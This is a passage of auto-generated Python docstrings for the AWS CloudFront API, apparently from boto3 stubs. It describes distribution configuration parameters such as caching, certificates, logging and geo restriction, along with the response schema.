If you specify all or none for the value of Forward , omit WhitelistedNames . If you change the value of Forward from whitelist to all or none and you don't delete the WhitelistedNames element and its child elements, CloudFront deletes them automatically.
For the current limit on the number of cookie names that you can whitelist for each cache behavior, see Amazon CloudFront Limits in the AWS General Reference .
Quantity (integer) -- [REQUIRED]The number of different cookies that you want CloudFront to forward to the origin for this cache behavior.
Items (list) --A complex type that contains one Name element for each cookie that you want CloudFront to forward to the origin for this cache behavior.
(string) --
Headers (dict) --A complex type that specifies the Headers , if any, that you want CloudFront to vary upon for this cache behavior.
Quantity (integer) -- [REQUIRED]The number of different headers that you want CloudFront to forward to the origin for this cache behavior. You can configure each cache behavior in a web distribution to do one of the following:
Forward all headers to your origin : Specify 1 for Quantity and * for Name .
Warning
If you configure CloudFront to forward all headers to your origin, CloudFront doesn't cache the objects associated with this cache behavior. Instead, it sends every request to the origin.
Forward a whitelist of headers you specify : Specify the number of headers that you want to forward, and specify the header names in Name elements. CloudFront caches your objects based on the values in all of the specified headers. CloudFront also forwards the headers that it forwards by default, but it caches your objects based only on the headers that you specify.
Forward only the default headers : Specify 0 for Quantity and omit Items . In this configuration, CloudFront doesn't cache based on the values in the request headers.
Items (list) --A complex type that contains one Name element for each header that you want CloudFront to forward to the origin and to vary on for this cache behavior. If Quantity is 0 , omit Items .
(string) --
QueryStringCacheKeys (dict) --A complex type that contains information about the query string parameters that you want CloudFront to use for caching for this cache behavior.
Quantity (integer) -- [REQUIRED]The number of whitelisted query string parameters for this cache behavior.
Items (list) --(Optional) A list that contains the query string parameters that you want CloudFront to use as a basis for caching for this cache behavior. If Quantity is 0, you can omit Items .
(string) --
TrustedSigners (dict) -- [REQUIRED]A complex type that specifies the AWS accounts, if any, that you want to allow to create signed URLs for private content.
If you want to require signed URLs in requests for objects in the target origin that match the PathPattern for this cache behavior, specify true for Enabled , and specify the applicable values for Quantity and Items . For more information, see Serving Private Content through CloudFront in the Amazon Amazon CloudFront Developer Guide .
If you don't want to require signed URLs in requests for objects that match PathPattern , specify false for Enabled and 0 for Quantity . Omit Items .
To add, change, or remove one or more trusted signers, change Enabled to true (if it's currently false ), change Quantity as applicable, and specify all of the trusted signers that you want to include in the updated distribution.
Enabled (boolean) -- [REQUIRED]Specifies whether you want to require viewers to use signed URLs to access the files specified by PathPattern and TargetOriginId .
Quantity (integer) -- [REQUIRED]The number of trusted signers for this cache behavior.
Items (list) --
Optional : A complex type that contains trusted signers for this cache behavior. If Quantity is 0 , you can omit Items .
(string) --
ViewerProtocolPolicy (string) -- [REQUIRED]The protocol that viewers can use to access the files in the origin specified by TargetOriginId when a request matches the path pattern in PathPattern . You can specify the following options:
allow-all : Viewers can use HTTP or HTTPS.
redirect-to-https : If a viewer submits an HTTP request, CloudFront returns an HTTP status code of 301 (Moved Permanently) to the viewer along with the HTTPS URL. The viewer then resubmits the request using the new URL.
https-only : If a viewer sends an HTTP request, CloudFront returns an HTTP status code of 403 (Forbidden).
For more information about requiring the HTTPS protocol, see Using an HTTPS Connection to Access Your Objects in the Amazon CloudFront Developer Guide .
Note
The only way to guarantee that viewers retrieve an object that was fetched from the origin using HTTPS is never to use any other protocol to fetch the object. If you have recently changed from HTTP to HTTPS, we recommend that you clear your objects' cache because cached objects are protocol agnostic. That means that an edge location will return an object from the cache regardless of whether the current request protocol matches the protocol used previously. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide .
MinTTL (integer) -- [REQUIRED]The minimum amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon Amazon CloudFront Developer Guide .
You must specify 0 for MinTTL if you configure CloudFront to forward all headers to your origin (under Headers , if you specify 1 for Quantity and * for Name ).
AllowedMethods (dict) --A complex type that controls which HTTP methods CloudFront processes and forwards to your Amazon S3 bucket or your custom origin. There are three choices:
CloudFront forwards only GET and HEAD requests.
CloudFront forwards only GET , HEAD , and OPTIONS requests.
CloudFront forwards GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests.
If you pick the third choice, you may need to restrict access to your Amazon S3 bucket or to your custom origin so users can't perform operations that you don't want them to. For example, you might not want users to have permissions to delete objects from your origin.
Quantity (integer) -- [REQUIRED]The number of HTTP methods that you want CloudFront to forward to your origin. Valid values are 2 (for GET and HEAD requests), 3 (for GET , HEAD , and OPTIONS requests) and 7 (for GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests).
Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to process and forward to your origin.
(string) --
CachedMethods (dict) --A complex type that controls whether CloudFront caches the response to requests using the specified HTTP methods. There are two choices:
CloudFront caches responses to GET and HEAD requests.
CloudFront caches responses to GET , HEAD , and OPTIONS requests.
If you pick the second choice for your Amazon S3 Origin, you may need to forward Access-Control-Request-Method, Access-Control-Request-Headers, and Origin headers for the responses to be cached correctly.
Quantity (integer) -- [REQUIRED]The number of HTTP methods for which you want CloudFront to cache responses. Valid values are 2 (for caching responses to GET and HEAD requests) and 3 (for caching responses to GET , HEAD , and OPTIONS requests).
Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to cache responses to.
(string) --
SmoothStreaming (boolean) --Indicates whether you want to distribute media files in the Microsoft Smooth Streaming format using the origin that is associated with this cache behavior. If so, specify true ; if not, specify false . If you specify true for SmoothStreaming , you can still distribute other content using this cache behavior if the content matches the value of PathPattern .
DefaultTTL (integer) --The default amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. The value that you specify applies only when your origin does not add HTTP headers such as Cache-Control max-age , Cache-Control s-maxage , and Expires to objects. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide .
MaxTTL (integer) --The maximum amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. The value that you specify applies only when your origin adds HTTP headers such as Cache-Control max-age , Cache-Control s-maxage , and Expires to objects. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide .
Compress (boolean) --Whether you want CloudFront to automatically compress certain files for this cache behavior. If so, specify true; if not, specify false. For more information, see Serving Compressed Files in the Amazon CloudFront Developer Guide .
LambdaFunctionAssociations (dict) --A complex type that contains zero or more Lambda function associations for a cache behavior.
Quantity (integer) -- [REQUIRED]The number of Lambda function associations for this cache behavior.
Items (list) --
Optional : A complex type that contains LambdaFunctionAssociation items for this cache behavior. If Quantity is 0 , you can omit Items .
(dict) --A complex type that contains a Lambda function association.
LambdaFunctionARN (string) --The ARN of the Lambda function.
EventType (string) --Specifies the event type that triggers a Lambda function invocation. Valid values are:
viewer-request
origin-request
viewer-response
origin-response
CustomErrorResponses (dict) --A complex type that controls the following:
Whether CloudFront replaces HTTP status codes in the 4xx and 5xx range with custom error messages before returning the response to the viewer.
How long CloudFront caches HTTP status codes in the 4xx and 5xx range.
For more information about custom error pages, see Customizing Error Responses in the Amazon CloudFront Developer Guide .
Quantity (integer) -- [REQUIRED]The number of HTTP status codes for which you want to specify a custom error page and/or a caching duration. If Quantity is 0 , you can omit Items .
Items (list) --A complex type that contains a CustomErrorResponse element for each HTTP status code for which you want to specify a custom error page and/or a caching duration.
(dict) --A complex type that controls:
Whether CloudFront replaces HTTP status codes in the 4xx and 5xx range with custom error messages before returning the response to the viewer.
How long CloudFront caches HTTP status codes in the 4xx and 5xx range.
For more information about custom error pages, see Customizing Error Responses in the Amazon CloudFront Developer Guide .
ErrorCode (integer) -- [REQUIRED]The HTTP status code for which you want to specify a custom error page and/or a caching duration.
ResponsePagePath (string) --The path to the custom error page that you want CloudFront to return to a viewer when your origin returns the HTTP status code specified by ErrorCode , for example, /4xx-errors/403-forbidden.html . If you want to store your objects and your custom error pages in different locations, your distribution must include a cache behavior for which the following is true:
The value of PathPattern matches the path to your custom error messages. For example, suppose you saved custom error pages for 4xx errors in an Amazon S3 bucket in a directory named /4xx-errors . Your distribution must include a cache behavior for which the path pattern routes requests for your custom error pages to that location, for example, /4xx-errors/* .
The value of TargetOriginId specifies the value of the ID element for the origin that contains your custom error pages.
If you specify a value for ResponsePagePath , you must also specify a value for ResponseCode . If you don't want to specify a value, include an empty element, ResponsePagePath , in the XML document.
We recommend that you store custom error pages in an Amazon S3 bucket. If you store custom error pages on an HTTP server and the server starts to return 5xx errors, CloudFront can't get the files that you want to return to viewers because the origin server is unavailable.
ResponseCode (string) --The HTTP status code that you want CloudFront to return to the viewer along with the custom error page. There are a variety of reasons that you might want CloudFront to return a status code different from the status code that your origin returned to CloudFront, for example:
Some Internet devices (some firewalls and corporate proxies, for example) intercept HTTP 4xx and 5xx and prevent the response from being returned to the viewer. If you substitute 200 , the response typically won't be intercepted.
If you don't care about distinguishing among different client errors or server errors, you can specify 400 or 500 as the ResponseCode for all 4xx or 5xx errors.
You might want to return a 200 status code (OK) and static website so your customers don't know that your website is down.
If you specify a value for ResponseCode , you must also specify a value for ResponsePagePath . If you don't want to specify a value, include an empty element, ResponseCode , in the XML document.
ErrorCachingMinTTL (integer) --The minimum amount of time, in seconds, that you want CloudFront to cache the HTTP status code specified in ErrorCode . When this time period has elapsed, CloudFront queries your origin to see whether the problem that caused the error has been resolved and the requested object is now available.
If you don't want to specify a value, include an empty element, ErrorCachingMinTTL , in the XML document.
For more information, see Customizing Error Responses in the Amazon CloudFront Developer Guide .
Comment (string) -- [REQUIRED]Any comments you want to include about the distribution.
If you don't want to specify a comment, include an empty Comment element.
To delete an existing comment, update the distribution configuration and include an empty Comment element.
To add or change a comment, update the distribution configuration and specify the new comment.
Logging (dict) --A complex type that controls whether access logs are written for the distribution.
For more information about logging, see Access Logs in the Amazon CloudFront Developer Guide .
Enabled (boolean) -- [REQUIRED]Specifies whether you want CloudFront to save access logs to an Amazon S3 bucket. If you do not want to enable logging when you create a distribution or if you want to disable logging for an existing distribution, specify false for Enabled , and specify empty Bucket and Prefix elements. If you specify false for Enabled but you specify values for Bucket , prefix , and IncludeCookies , the values are automatically deleted.
IncludeCookies (boolean) -- [REQUIRED]Specifies whether you want CloudFront to include cookies in access logs, specify true for IncludeCookies . If you choose to include cookies in logs, CloudFront logs all cookies regardless of how you configure the cache behaviors for this distribution. If you do not want to include cookies when you create a distribution or if you want to disable include cookies for an existing distribution, specify false for IncludeCookies .
Bucket (string) -- [REQUIRED]The Amazon S3 bucket to store the access logs in, for example, myawslogbucket.s3.amazonaws.com .
Prefix (string) -- [REQUIRED]An optional string that you want CloudFront to prefix to the access log filenames for this distribution, for example, myprefix/ . If you want to enable logging, but you do not want to specify a prefix, you still must include an empty Prefix element in the Logging element.
PriceClass (string) --The price class that corresponds with the maximum price that you want to pay for CloudFront service. If you specify PriceClass_All , CloudFront responds to requests for your objects from all CloudFront edge locations.
If you specify a price class other than PriceClass_All , CloudFront serves your objects from the CloudFront edge location that has the lowest latency among the edge locations in your price class. Viewers who are in or near regions that are excluded from your specified price class may encounter slower performance.
For more information about price classes, see Choosing the Price Class for a CloudFront Distribution in the Amazon CloudFront Developer Guide . For information about CloudFront pricing, including how price classes map to CloudFront regions, see Amazon CloudFront Pricing .
Enabled (boolean) -- [REQUIRED]From this field, you can enable or disable the selected distribution.
If you specify false for Enabled but you specify values for Bucket and Prefix , the values are automatically deleted.
ViewerCertificate (dict) --A complex type that specifies the following:
Which SSL/TLS certificate to use when viewers request objects using HTTPS
Whether you want CloudFront to use dedicated IP addresses or SNI when you're using alternate domain names in your object names
The minimum protocol version that you want CloudFront to use when communicating with viewers
For more information, see Using an HTTPS Connection to Access Your Objects in the Amazon Amazon CloudFront Developer Guide .
CloudFrontDefaultCertificate (boolean) --
IAMCertificateId (string) --
ACMCertificateArn (string) --
SSLSupportMethod (string) --If you specify a value for ACMCertificateArn or for IAMCertificateId , you must also specify how you want CloudFront to serve HTTPS requests: using a method that works for all clients or one that works for most clients:
vip : CloudFront uses dedicated IP addresses for your content and can respond to HTTPS requests from any viewer. However, you will incur additional monthly charges.
sni-only : CloudFront can respond to HTTPS requests from viewers that support Server Name Indication (SNI). All modern browsers support SNI, but some browsers still in use don't support SNI. If some of your users' browsers don't support SNI, we recommend that you do one of the following:
Use the vip option (dedicated IP addresses) instead of sni-only .
Use the CloudFront SSL/TLS certificate instead of a custom certificate. This requires that you use the CloudFront domain name of your distribution in the URLs for your objects, for example, https://d111111abcdef8.cloudfront.net/logo.png .
If you can control which browser your users use, upgrade the browser to one that supports SNI.
Use HTTP instead of HTTPS.
Do not specify a value for SSLSupportMethod if you specified CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate .
For more information, see Using Alternate Domain Names and HTTPS in the Amazon CloudFront Developer Guide .
MinimumProtocolVersion (string) --Specify the minimum version of the SSL/TLS protocol that you want CloudFront to use for HTTPS connections between viewers and CloudFront: SSLv3 or TLSv1 . CloudFront serves your objects only to viewers that support SSL/TLS version that you specify and later versions. The TLSv1 protocol is more secure, so we recommend that you specify SSLv3 only if your users are using browsers or devices that don't support TLSv1 . Note the following:
If you specify CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate, the minimum SSL protocol version is TLSv1 and can't be changed.
If you're using a custom certificate (if you specify a value for ACMCertificateArn or for IAMCertificateId ) and if you're using SNI (if you specify sni-only for SSLSupportMethod ), you must specify TLSv1 for MinimumProtocolVersion .
Certificate (string) --Include one of these values to specify the following:
Whether you want viewers to use HTTP or HTTPS to request your objects.
If you want viewers to use HTTPS, whether you're using an alternate domain name such as example.com or the CloudFront domain name for your distribution, such as d111111abcdef8.cloudfront.net .
If you're using an alternate domain name, whether AWS Certificate Manager (ACM) provided the certificate, or you purchased a certificate from a third-party certificate authority and imported it into ACM or uploaded it to the IAM certificate store.
You must specify one (and only one) of the three values. Do not specify false for CloudFrontDefaultCertificate .
If you want viewers to use HTTP to request your objects : Specify the following value:CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate
In addition, specify allow-all for ViewerProtocolPolicy for all of your cache behaviors.
If you want viewers to use HTTPS to request your objects : Choose the type of certificate that you want to use based on whether you're using an alternate domain name for your objects or the CloudFront domain name:
If you're using an alternate domain name, such as example.com : Specify one of the following values, depending on whether ACM provided your certificate or you purchased your certificate from third-party certificate authority:
ACMCertificateArnARN for ACM SSL/TLS certificateACMCertificateArn where ARN for ACM SSL/TLS certificate is the ARN for the ACM SSL/TLS certificate that you want to use for this distribution.
IAMCertificateIdIAM certificate IDIAMCertificateId where IAM certificate ID is the ID that IAM returned when you added the certificate to the IAM certificate store.
If you specify ACMCertificateArn or IAMCertificateId , you must also specify a value for SSLSupportMethod .
If you choose to use an ACM certificate or a certificate in the IAM certificate store, we recommend that you use only an alternate domain name in your object URLs (https://example.com/logo.jpg ). If you use the domain name that is associated with your CloudFront distribution (https://d111111abcdef8.cloudfront.net/logo.jpg ) and the viewer supports SNI , then CloudFront behaves normally. However, if the browser does not support SNI, the user's experience depends on the value that you choose for SSLSupportMethod :
vip : The viewer displays a warning because there is a mismatch between the CloudFront domain name and the domain name in your SSL/TLS certificate.
sni-only : CloudFront drops the connection with the browser without returning the object.
**If you're using the CloudFront domain name for your distribution, such as d111111abcdef8.cloudfront.net ** : Specify the following value: `` CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate`` If you want viewers to use HTTPS, you must also specify one of the following values in your cache behaviors:
ViewerProtocolPolicyhttps-onlyViewerProtocolPolicy
ViewerProtocolPolicyredirect-to-httpsViewerProtocolPolicy
You can also optionally require that CloudFront use HTTPS to communicate with your origin by specifying one of the following values for the applicable origins:
OriginProtocolPolicyhttps-onlyOriginProtocolPolicy
OriginProtocolPolicymatch-viewerOriginProtocolPolicy
For more information, see Using Alternate Domain Names and HTTPS in the Amazon CloudFront Developer Guide .
CertificateSource (string) --
Note
This field is deprecated. You can use one of the following: [ACMCertificateArn , IAMCertificateId , or CloudFrontDefaultCertificate] .
Restrictions (dict) --A complex type that identifies ways in which you want to restrict distribution of your content.
GeoRestriction (dict) -- [REQUIRED]A complex type that controls the countries in which your content is distributed. CloudFront determines the location of your users using MaxMind GeoIP databases.
RestrictionType (string) -- [REQUIRED]The method that you want to use to restrict distribution of your content by country:
none : No geo restriction is enabled, meaning access to content is not restricted by client geo location.
blacklist : The Location elements specify the countries in which you do not want CloudFront to distribute your content.
whitelist : The Location elements specify the countries in which you want CloudFront to distribute your content.
Quantity (integer) -- [REQUIRED]When geo restriction is enabled , this is the number of countries in your whitelist or blacklist . Otherwise, when it is not enabled, Quantity is 0 , and you can omit Items .
Items (list) --A complex type that contains a Location element for each country in which you want CloudFront either to distribute your content (whitelist ) or not distribute your content (blacklist ).
The Location element is a two-letter, uppercase country code for a country that you want to include in your blacklist or whitelist . Include one Location element for each country.
CloudFront and MaxMind both use ISO 3166 country codes. For the current list of countries and the corresponding codes, see ISO 3166-1-alpha-2 code on the International Organization for Standardization website. You can also refer to the country list in the CloudFront console, which includes both country names and codes.
(string) --
WebACLId (string) --A unique identifier that specifies the AWS WAF web ACL, if any, to associate with this distribution.
AWS WAF is a web application firewall that lets you monitor the HTTP and HTTPS requests that are forwarded to CloudFront, and lets you control access to your content. Based on conditions that you specify, such as the IP addresses that requests originate from or the values of query strings, CloudFront responds to requests either with the requested content or with an HTTP 403 status code (Forbidden). You can also configure CloudFront to return a custom error page when a request is blocked. For more information about AWS WAF, see the AWS WAF Developer Guide .
HttpVersion (string) --(Optional) Specify the maximum HTTP version that you want viewers to use to communicate with CloudFront. The default value for new web distributions is http2. Viewers that don't support HTTP/2 automatically use an earlier HTTP version.
For viewers and CloudFront to use HTTP/2, viewers must support TLS 1.2 or later, and must support Server Name Identification (SNI).
In general, configuring CloudFront to communicate with viewers using HTTP/2 reduces latency. You can improve performance by optimizing for HTTP/2. For more information, do an Internet search for 'http/2 optimization.'
IsIPV6Enabled (boolean) --If you want CloudFront to respond to IPv6 DNS requests with an IPv6 address for your distribution, specify true . If you specify false , CloudFront responds to IPv6 DNS requests with the DNS response code NOERROR and with no IP addresses. This allows viewers to submit a second request, for an IPv4 address for your distribution.
In general, you should enable IPv6 if you have users on IPv6 networks who want to access your content. However, if you're using signed URLs or signed cookies to restrict access to your content, and if you're using a custom policy that includes the IpAddress parameter to restrict the IP addresses that can access your content, do not enable IPv6. If you want to restrict access to some content by IP address and not restrict access to other content (or restrict access but not by IP address), you can create two distributions. For more information, see Creating a Signed URL Using a Custom Policy in the Amazon CloudFront Developer Guide .
If you're using an Amazon Route 53 alias resource record set to route traffic to your CloudFront distribution, you need to create a second alias resource record set when both of the following are true:
You enable IPv6 for the distribution
You're using alternate domain names in the URLs for your objects
For more information, see Routing Traffic to an Amazon CloudFront Web Distribution by Using Your Domain Name in the Amazon Route 53 Developer Guide .
If you created a CNAME resource record set, either with Amazon Route 53 or with another DNS service, you don't need to make any changes. A CNAME record will route traffic to your distribution regardless of the IP address format of the viewer request.
:rtype: dict
:return: {
'Distribution': {
'Id': 'string',
'ARN': 'string',
'Status': 'string',
'LastModifiedTime': datetime(2015, 1, 1),
'InProgressInvalidationBatches': 123,
'DomainName': 'string',
'ActiveTrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
{
'AwsAccountNumber': 'string',
'KeyPairIds': {
'Quantity': 123,
'Items': [
'string',
]
}
},
]
},
'DistributionConfig': {
'CallerReference': 'string',
'Aliases': {
'Quantity': 123,
'Items': [
'string',
]
},
'DefaultRootObject': 'string',
'Origins': {
'Quantity': 123,
'Items': [
{
'Id': 'string',
'DomainName': 'string',
'OriginPath': 'string',
'CustomHeaders': {
'Quantity': 123,
'Items': [
{
'HeaderName': 'string',
'HeaderValue': 'string'
},
]
},
'S3OriginConfig': {
'OriginAccessIdentity': 'string'
},
'CustomOriginConfig': {
'HTTPPort': 123,
'HTTPSPort': 123,
'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only',
'OriginSslProtocols': {
'Quantity': 123,
'Items': [
'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2',
]
},
'OriginReadTimeout': 123,
'OriginKeepaliveTimeout': 123
}
},
]
},
'DefaultCacheBehavior': {
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
'CacheBehaviors': {
'Quantity': 123,
'Items': [
{
'PathPattern': 'string',
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
]
},
'CustomErrorResponses': {
'Quantity': 123,
'Items': [
{
'ErrorCode': 123,
'ResponsePagePath': 'string',
'ResponseCode': 'string',
'ErrorCachingMinTTL': 123
},
]
},
'Comment': 'string',
'Logging': {
'Enabled': True|False,
'IncludeCookies': True|False,
'Bucket': 'string',
'Prefix': 'string'
},
'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All',
'Enabled': True|False,
'ViewerCertificate': {
'CloudFrontDefaultCertificate': True|False,
'IAMCertificateId': 'string',
'ACMCertificateArn': 'string',
'SSLSupportMethod': 'sni-only'|'vip',
'MinimumProtocolVersion': 'SSLv3'|'TLSv1',
'Certificate': 'string',
'CertificateSource': 'cloudfront'|'iam'|'acm'
},
'Restrictions': {
'GeoRestriction': {
'RestrictionType': 'blacklist'|'whitelist'|'none',
'Quantity': 123,
'Items': [
'string',
]
}
},
'WebACLId': 'string',
'HttpVersion': 'http1.1'|'http2',
'IsIPV6Enabled': True|False
}
},
'Location': 'string',
'ETag': 'string'
}
:returns:
If you configured Amazon S3 Transfer Acceleration for your bucket, do not specify the s3-accelerate endpoint for DomainName .
The bucket name must be between 3 and 63 characters long (inclusive).
The bucket name must contain only lowercase characters, numbers, periods, underscores, and dashes.
The bucket name must not contain adjacent periods.
"""
pass
def create_distribution_with_tags(DistributionConfigWithTags=None):
"""
Create a new distribution with tags.
See also: AWS API Documentation
:example: response = client.create_distribution_with_tags(
DistributionConfigWithTags={
'DistributionConfig': {
'CallerReference': 'string',
'Aliases': {
'Quantity': 123,
'Items': [
'string',
]
},
'DefaultRootObject': 'string',
'Origins': {
'Quantity': 123,
'Items': [
{
'Id': 'string',
'DomainName': 'string',
'OriginPath': 'string',
'CustomHeaders': {
'Quantity': 123,
'Items': [
{
'HeaderName': 'string',
'HeaderValue': 'string'
},
]
},
'S3OriginConfig': {
'OriginAccessIdentity': 'string'
},
'CustomOriginConfig': {
'HTTPPort': 123,
'HTTPSPort': 123,
'OriginProtocolPolicy': 'http-only'|'match-viewer'|'https-only',
'OriginSslProtocols': {
'Quantity': 123,
'Items': [
'SSLv3'|'TLSv1'|'TLSv1.1'|'TLSv1.2',
]
},
'OriginReadTimeout': 123,
'OriginKeepaliveTimeout': 123
}
},
]
},
'DefaultCacheBehavior': {
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
'CacheBehaviors': {
'Quantity': 123,
'Items': [
{
'PathPattern': 'string',
'TargetOriginId': 'string',
'ForwardedValues': {
'QueryString': True|False,
'Cookies': {
'Forward': 'none'|'whitelist'|'all',
'WhitelistedNames': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'Headers': {
'Quantity': 123,
'Items': [
'string',
]
},
'QueryStringCacheKeys': {
'Quantity': 123,
'Items': [
'string',
]
}
},
'TrustedSigners': {
'Enabled': True|False,
'Quantity': 123,
'Items': [
'string',
]
},
'ViewerProtocolPolicy': 'allow-all'|'https-only'|'redirect-to-https',
'MinTTL': 123,
'AllowedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
],
'CachedMethods': {
'Quantity': 123,
'Items': [
'GET'|'HEAD'|'POST'|'PUT'|'PATCH'|'OPTIONS'|'DELETE',
]
}
},
'SmoothStreaming': True|False,
'DefaultTTL': 123,
'MaxTTL': 123,
'Compress': True|False,
'LambdaFunctionAssociations': {
'Quantity': 123,
'Items': [
{
'LambdaFunctionARN': 'string',
'EventType': 'viewer-request'|'viewer-response'|'origin-request'|'origin-response'
},
]
}
},
]
},
'CustomErrorResponses': {
'Quantity': 123,
'Items': [
{
'ErrorCode': 123,
'ResponsePagePath': 'string',
'ResponseCode': 'string',
'ErrorCachingMinTTL': 123
},
]
},
'Comment': 'string',
'Logging': {
'Enabled': True|False,
'IncludeCookies': True|False,
'Bucket': 'string',
'Prefix': 'string'
},
'PriceClass': 'PriceClass_100'|'PriceClass_200'|'PriceClass_All',
'Enabled': True|False,
'ViewerCertificate': {
'CloudFrontDefaultCertificate': True|False,
'IAMCertificateId': 'string',
'ACMCertificateArn': 'string',
'SSLSupportMethod': 'sni-only'|'vip',
'MinimumProtocolVersion': 'SSLv3'|'TLSv1',
'Certificate': 'string',
'CertificateSource': 'cloudfront'|'iam'|'acm'
},
'Restrictions': {
'GeoRestriction': {
'RestrictionType': 'blacklist'|'whitelist'|'none',
'Quantity': 123,
'Items': [
'string',
]
}
},
'WebACLId': 'string',
'HttpVersion': 'http1.1'|'http2',
'IsIPV6Enabled': True|False
},
'Tags': {
'Items': [
{
'Key': 'string',
'Value': 'string'
},
]
}
}
)
:type DistributionConfigWithTags: dict
:param DistributionConfigWithTags: [REQUIRED]
The distribution's configuration information.
DistributionConfig (dict) -- [REQUIRED]A distribution configuration.
CallerReference (string) -- [REQUIRED]A unique value (for example, a date-time stamp) that ensures that the request can't be replayed.
If the value of CallerReference is new (regardless of the content of the DistributionConfig object), CloudFront creates a new distribution.
If CallerReference is a value you already sent in a previous request to create a distribution, and if the content of the DistributionConfig is identical to the original request (ignoring white space), CloudFront returns the same the response that it returned to the original request.
If CallerReference is a value you already sent in a previous request to create a distribution but the content of the DistributionConfig is different from the original request, CloudFront returns a DistributionAlreadyExists error.
Aliases (dict) --A complex type that contains information about CNAMEs (alternate domain names), if any, for this distribution.
Quantity (integer) -- [REQUIRED]The number of CNAME aliases, if any, that you want to associate with this distribution.
Items (list) --A complex type that contains the CNAME aliases, if any, that you want to associate with this distribution.
(string) --
DefaultRootObject (string) --The object that you want CloudFront to request from your origin (for example, index.html ) when a viewer requests the root URL for your distribution (http://www.example.com ) instead of an object in your distribution (http://www.example.com/product-description.html ). Specifying a default root object avoids exposing the contents of your distribution.
Specify only the object name, for example, index.html . Do not add a / before the object name.
If you don't want to specify a default root object when you create a distribution, include an empty DefaultRootObject element.
To delete the default root object from an existing distribution, update the distribution configuration and include an empty DefaultRootObject element.
To replace the default root object, update the distribution configuration and specify the new object.
For more information about the default root object, see Creating a Default Root Object in the Amazon CloudFront Developer Guide .
Origins (dict) -- [REQUIRED]A complex type that contains information about origins for this distribution.
